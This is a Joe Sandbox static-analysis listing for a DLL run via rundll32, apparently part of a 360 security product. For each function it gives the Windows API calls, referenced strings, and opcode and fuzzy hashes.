String ID: %hu-%hu-%hu %hu:%hu:%hu
API String ID: 34346384-1004895946
Opcode ID: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
Instruction ID: 56cd0a7082cee1cdafaeaa7a6634e2a063740646281a87663471f261b7941616
Opcode Fuzzy Hash: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
Instruction Fuzzy Hash: 53210472B10B1889FB81DFA4D8803DD33B4B708788F948526EA1D96768EF34C659C750

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0000000180019190
memset.MSVCRT ref: 00000001800191B6
GetLongPathNameW.KERNEL32 ref: 00000001800191C9

Strings

System32, xrefs: 0000000180019166

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: LongNamePathmemsetwcschr
String ID: System32
API String ID: 1234868084-919923750
Opcode ID: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
Instruction ID: 022cfa0bf7d635e91ec6b184de1930e682d5e478c1da967905a178ce1f931210
Opcode Fuzzy Hash: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
Instruction Fuzzy Hash: DA117536304A4892EBA1DB55E4843DA23A0F78CBD4F948625ABBD437D5DF38C699C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180067610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 0000000180067681

Part of subcall function 0000000180067060: memset.MSVCRT ref: 00000001800670C0

??1exception@@UEAA@XZ.MSVCRT ref: 00000001800676D8

Strings

bad allocation, xrefs: 0000000180067626
csm, xrefs: 00000001800676A3

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??1exception@@FileHeadermemset
String ID: bad allocation$csm
API String ID: 3064007109-2003371537
Opcode ID: b6a60749b78c48c230b9495ee51191fab89657cf486f85ec67875e06bd0adf6d
Instruction ID: a6dd51a1d05e896956d3c811062f43cd0c17e0d4951ee49045dad2b426ca4241
Opcode Fuzzy Hash: b6a60749b78c48c230b9495ee51191fab89657cf486f85ec67875e06bd0adf6d
Instruction Fuzzy Hash: 10214772609B8496DB51CF10F4443CEB3A4F3883A0F514229E6AD47BA4DF79CA49CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040358 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004038D
SHGetSpecialFolderPathW.SHELL32 ref: 00000001800403A0

Part of subcall function 0000000180019044: LoadLibraryExW.KERNEL32 ref: 000000018001906D
Part of subcall function 0000000180019044: FindResourceW.KERNEL32 ref: 0000000180019085
Part of subcall function 0000000180019044: SizeofResource.KERNEL32 ref: 0000000180019099
Part of subcall function 0000000180019044: LoadResource.KERNEL32 ref: 00000001800190A8
Part of subcall function 0000000180019044: LockResource.KERNEL32 ref: 00000001800190B9
Part of subcall function 0000000180019044: malloc.MSVCRT ref: 00000001800190CA
Part of subcall function 0000000180019044: memmove.MSVCRT ref: 00000001800190E1
Part of subcall function 0000000180019044: FreeResource.KERNEL32 ref: 00000001800190E9
Part of subcall function 0000000180019044: FreeLibrary.KERNEL32 ref: 00000001800190F2
Part of subcall function 0000000180019044: VerQueryValueW.VERSION ref: 000000018001911A
Part of subcall function 0000000180019044: free.MSVCRT ref: 000000018001913F

Strings

\Internet Explorer\IEXPLORE.EXE, xrefs: 00000001800403A6
%u.%u.%u, xrefs: 00000001800403D4

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
API String ID: 28297470-3177478685
Opcode ID: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
Instruction ID: 8c267d1c97a4f3ae60188c217bf77148b2efdc3265efdf379ec177d08f4db65c
Opcode Fuzzy Hash: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
Instruction Fuzzy Hash: 95118F32325A8986EB91DB25E4457DB7360F78C789F805012B68A47955DF3DC609CF00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C7D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

GetModuleFileNameW.KERNEL32 ref: 000000018003C829
PathAppendW.SHLWAPI ref: 000000018003C83B
PathFileExistsW.SHLWAPI ref: 000000018003C846

Strings

..\360NetBase64.dll, xrefs: 000000018003C82F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
String ID: ..\360NetBase64.dll
API String ID: 2373086246-4183035884
Opcode ID: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
Instruction ID: af5cf4f44f90b4c64e773468feb6851d22c47134ddc293a853e7e5ebda926cde
Opcode Fuzzy Hash: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
Instruction Fuzzy Hash: 25114C71614A4981FBF3AB60E8953DB23A0FB8D7C9F518115B58D825A5EF28C74DC702

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002DE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 0000000180002E06
wcsncmp.MSVCRT ref: 0000000180002E20
PathIsDirectoryW.SHLWAPI ref: 0000000180002E34

Strings

\\?\, xrefs: 0000000180002DFF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcsncmp$DirectoryPath
String ID: \\?\
API String ID: 911398208-4282027825
Opcode ID: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
Instruction ID: 9903006c7179f3997e6314bb7e882962eeb1ce79a0b7cc9db4c5bfd4c7dd6eaa
Opcode Fuzzy Hash: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
Instruction Fuzzy Hash: E501AD3036568882FBA2EB25EC457E97214BB4CBD0F848235B96A8B1E5DF6CC34DC304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800142E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180014317
GetModuleFileNameW.KERNEL32 ref: 000000018001432E
PathAppendW.SHLWAPI ref: 0000000180014340

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

Strings

..\safemon\FreeSaaS.tpi, xrefs: 0000000180014334

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
String ID: ..\safemon\FreeSaaS.tpi
API String ID: 154803636-205188023
Opcode ID: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
Instruction ID: d74fc56e569283819db6817bdf86699dd223bda9e6afadc26b68049d38556e4d
Opcode Fuzzy Hash: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
Instruction Fuzzy Hash: B5016D35219A8C82FBE2D721EC693D92790B78D388F80D041A4AA077A1DF2DC30DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800560C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B

Strings

D:P(OA;;FA;;;WD), xrefs: 00000001800560EC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
String ID: D:P(OA;;FA;;;WD)
API String ID: 794372803-936388898
Opcode ID: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
Instruction ID: 0d5b46b33c23d90729eae48064ade5dfd8da35591b75e80b0d34519ac450dbba
Opcode Fuzzy Hash: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
Instruction Fuzzy Hash: 44014B72A14F4486EB518F21F8487A973E0F78CBD4F468221EA5D87714DF38C658C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002AD5C Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 381COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_wcsicmp.MSVCRT ref: 000000018002AE4E

Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B

Strings

, xrefs: 000000018002B093
CLSID, xrefs: 000000018002AEFC
ftp:, xrefs: 000000018002AE44

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FromHeapProcessString_wcsicmp
String ID: $CLSID$ftp:
API String ID: 2012545421-381575252
Opcode ID: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
Instruction ID: d299122ce3e9d517528ccb327dc5a756d1d769515d838a72f3e491c2ced193a8
Opcode Fuzzy Hash: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
Instruction Fuzzy Hash: 41F14073301B4886EB52DB29D8407DE7361F789BE9F448311AA6D876E5DF78CA49C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006616C Relevance: 6.3, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001800661AC
LeaveCriticalSection.KERNEL32 ref: 00000001800661F5

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

malloc.MSVCRT ref: 000000018006621C
memmove.MSVCRT ref: 0000000180066241
free.MSVCRT ref: 0000000180066272

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
String ID:
API String ID: 1740668140-0
Opcode ID: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
Instruction ID: e94a3ea1fea36b0b32ca35adaff13378f84fa0a728ffd439e1abdc7c1a055df0
Opcode Fuzzy Hash: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
Instruction Fuzzy Hash: 4D316C32605B4886EB828F15EC543D977A5F79CBE4F59C225EAA9077A5CF3CC249C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006B608 Relevance: 6.2, APIs: 4, Instructions: 158COMMON

Download Yara Rule

APIs

_swprintf_c_l.LIBCMT ref: 000000018006B721
memmove.MSVCRT(00000003,?,00000003,?,?,00000000,?,0000000180068BC3), ref: 000000018006B734

Part of subcall function 000000018006AEC0: memset.MSVCRT ref: 000000018006B023

memset.MSVCRT ref: 000000018006B7A8
_swprintf_c_l.LIBCMT ref: 000000018006B7D6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _swprintf_c_lmemset$memmove
String ID:
API String ID: 529592607-0
Opcode ID: 6bc86c610155bdb5aebda1b2b46f1ef4a468bbe58387529f13665b23f30c6861
Instruction ID: ba4715e769750691a3bc0bfe9bd3733961d9e4a3663b4e6e6e4877dc311f9b78
Opcode Fuzzy Hash: 6bc86c610155bdb5aebda1b2b46f1ef4a468bbe58387529f13665b23f30c6861
Instruction Fuzzy Hash: 5851C072205B8885EBA1CF29E8007D973A5F788BC8F64C126EE5D83794DF38C659C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002CD40 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 142COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 000000018002CE3A

Strings

ScriptHostEncode, xrefs: 000000018002CDE1
ScriptEngine, xrefs: 000000018002CD6C
{0CF774D0-F077-11D1-B1BC-00C04F86C324}, xrefs: 000000018002CE2F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp
String ID: ScriptEngine$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
API String ID: 2081463915-2936173157
Opcode ID: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
Instruction ID: 292b1ab8c79ee979d74f734f58635ebd7dc6439912a4449b937fba72fcba6d7c
Opcode Fuzzy Hash: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
Instruction Fuzzy Hash: 5B514F72711E4986EB419F79C8807CC2760FB49BF4F449322AA3E936E5DF64C989C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006B434 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

_swprintf_c_l.LIBCMT ref: 000000018006B52E
memmove.MSVCRT ref: 000000018006B541

Part of subcall function 000000018006AEC0: memset.MSVCRT ref: 000000018006B023

memset.MSVCRT ref: 000000018006B5AE
_swprintf_c_l.LIBCMT ref: 000000018006B5D2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _swprintf_c_lmemset$memmove
String ID:
API String ID: 529592607-0
Opcode ID: f944d7871dad8b8b363b67a0dc826b8a901f6cc992fc975bf1c3b91d52d59fb4
Instruction ID: 645fb74c30286fe1cf00211cd1a8741acda599680070850ad10f3b39ebb77e1a
Opcode Fuzzy Hash: f944d7871dad8b8b363b67a0dc826b8a901f6cc992fc975bf1c3b91d52d59fb4
Instruction Fuzzy Hash: 695106B3214B8886E795DF26D8007E977A5F748BD8F64C115EE1A87784DF38C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C208 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?), ref: 000000018003C25E
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?), ref: 000000018003C2A7
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003C30E
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003C3A4

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
Instruction ID: ad71276d619936af7ac4a5a15bbb21467ea728ff9fc93a66917b9291cac940fe
Opcode Fuzzy Hash: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
Instruction Fuzzy Hash: 04514B36201B4886EB96CF21E844B9E33A9FB48BD8F158516EE6947768CF34C658C391

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007118C Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007119C
wcstol.MSVCRT ref: 00000001800711CB
_errno.MSVCRT ref: 00000001800711DD
free.MSVCRT ref: 000000018007157D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
Instruction ID: d086f90ac81a06e5d512d2f495a144483870d0a007861e51eb34273852a96ff0
Opcode Fuzzy Hash: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
Instruction Fuzzy Hash: 65516B326047888AEBA68F5AA0403EE73A4F7887D5F108115FF9957BD8CF3AD655CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C20C Relevance: 6.1, APIs: 4, Instructions: 128COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

SysFreeString.OLEAUT32 ref: 000000018004C293
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004C2A6
??3@YAXPEAX@Z.MSVCRT ref: 000000018004C2B9
SysFreeString.OLEAUT32 ref: 000000018004C385

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??2@Free$??3@Alloc
String ID:
API String ID: 1832687772-0
Opcode ID: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
Instruction ID: 427e473512a75300f47d7fa230ba5ccb5e5a60885440308665830fb44559812f
Opcode Fuzzy Hash: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
Instruction Fuzzy Hash: 58513A72711A0885EB91DFA5C8947ED3370FB48FE9F098621EE2A57698DF78C648C344

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800436D8 Relevance: 6.1, APIs: 4, Instructions: 125COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00000001800437E5
memmove.MSVCRT ref: 000000018004380E
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004383D
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004385D

Part of subcall function 00000001800433EC: memmove.MSVCRT ref: 0000000180043445
Part of subcall function 00000001800433EC: _time64.MSVCRT ref: 000000018004344C
Part of subcall function 00000001800433EC: srand.MSVCRT ref: 0000000180043455
Part of subcall function 00000001800433EC: rand.MSVCRT ref: 0000000180043463
Part of subcall function 00000001800433EC: memset.MSVCRT ref: 0000000180043547
Part of subcall function 00000001800433EC: memmove.MSVCRT ref: 000000018004355D

Part of subcall function 0000000180017AB4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180017ADF
Part of subcall function 0000000180017AB4: memset.MSVCRT ref: 0000000180017B1D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$memset$_time64htonlrandsrand
String ID:
API String ID: 2420628730-0
